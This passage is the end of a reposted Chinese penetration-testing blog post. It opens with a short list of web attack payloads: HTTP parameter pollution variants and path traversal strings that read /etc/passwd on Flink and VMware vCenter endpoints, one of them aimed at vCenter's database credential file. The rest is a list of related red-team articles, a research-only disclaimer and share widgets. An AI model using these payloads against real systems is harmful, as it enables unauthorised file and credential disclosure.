?id=1&id=2&id=exp
asp.net+iis:id=1,2,exp
asp+iis:id=1,2,exp
php+apache:id=exp
“url+/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd”
jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
#windows/eam/vib?id=C:ProgramDataVMwarevCenterServercfgvmware-vpxvcdb.properties
#linux/eam/vib?id=/etc/passwd
欢迎 在看丨留言丨分享至朋友圈 三连
好文推荐
-
实战杀猪盘渗透测试
-
三款windows下图形化应急响应工具 (附下载地址)
-
Nessus最新插件包20220925(附下载地址)
-
实战|一次不太成功的反诈骗渗透测试 -
CTF常用脚本工具(附下载地址) -
实战|一次对BC网站的渗透测试 -
实战|文件上传绕过的一次思路总结学习(两个上传点组合Getshell) -
AppScan10.0.8(附下载地址) -
BurpSuite_pro_v2022.8(附下载地址) -
一款强大的红队资产测绘工具 -
红队必备-防蜜罐抓到被打断腿 -
HVV之内存马检测工具 -
HVV中一种针对红队的新型溯源手段 -
HVV|蓝队防猝死手册 -
蓝队/红队钓鱼项目(附分析报告) -
红队防猝死手册 -
干货|红队全流程学习资料(附下载地址)
原文始发于微信公众号(乌雲安全):实战|记一次旁站渗透过程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论